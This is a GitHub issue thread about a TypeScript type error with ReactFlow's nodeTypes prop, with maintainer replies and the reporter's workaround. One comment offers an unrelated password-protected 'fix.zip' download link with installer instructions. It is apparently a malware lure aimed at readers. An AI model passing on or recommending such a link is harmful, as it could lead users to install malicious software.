### ISSUE TITLE
The ReactFlow component's nodeTypes defines the incorrect type of ts.

### ISSUE THREAD

**Issue by linyuling520** [xyflow/xyflow#4601]
### What platform were you using when you found the bug?

- React Flow / Svelte Flow version: "@xyflow/react": "^12.1.1"
- Browser and version: 
- OS and version:

### Describe the Bug

The ReactFlow component's nodeTypes defines the incorrect type of ts. This one is clearly passing custom nodes, but it's type is NodeTypes, which causes the ts to report an error.

```
              import StartNode from './customNode/StartNode';
              import LLMNode from './customNode/LLMNode';
              import EndNode from './customNode/EndNode';
              import SelectNode from './customNode/SelectNode';
              import PluginNode from './customNode/PluginNode';
              import CodeNode from './customNode/CodeNode';     

              export const nodeTypes = {
                START: StartNode,
                LLM: LLMNode,
                END: EndNode,
                SELECT: SelectNode,
                TOOL: PluginNode,
                CODE: CodeNode,
              };

              <ReactFlow
                  nodes={nodes}
                  edges={edges}
                  onNodesChange={onNodesChange}
                  onEdgesChange={onEdgesChange}
                  onReconnect={onReconnect}
                  onReconnectStart={onReconnectStart}
                  onReconnectEnd={onReconnectEnd}
                  onConnect={onConnect}
                  nodeTypes={nodeTypes}
                  connectOnClick
                  onNodeDragStop={handleNodeDragStop}
              >
                <MiniMap />
                <Controls />
              </ReactFlow>
```

### Steps to reproduce the bug or issue

nodeTypes reports the following error:
(JSX attribute) ReactFlowProps<NodeType extends Node<Record<string, unknown>, string> = Node<Record<string, unknown>, string>, EdgeType extends Edge<Record<string, unknown>, string | undefined> = Edge<Record<string, unknown>, string | undefined>>.connectOnClick?: boolean | undefined
![reactflow-error](https://github.com/user-attachments/assets/cea57aec-e108-426e-826d-2e13ddb3ad40)

### Expected behavior

Expect to fix the type of nodeTypes.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bcakmakoglu** [comment]
You really need to describe the error properly, you copied like the first half that doesn't even say *what the error is*.

Better yet, provide a clear reproduction that showcases the issue. [You can find a sandbox template here.](https://new.reactflow.dev/react-ts)

**Comment by moklick** [comment]
Is the custom node typed correctly? Could you try to expcility type nodeTypes by using `const nodeTypes: NodeTypes = {
  nameOfNodeType: CustomNode};`?

**Comment by linyuling520** [comment]
Define const nodeTypes: { [key: string]: any } = xxx; this solves it.
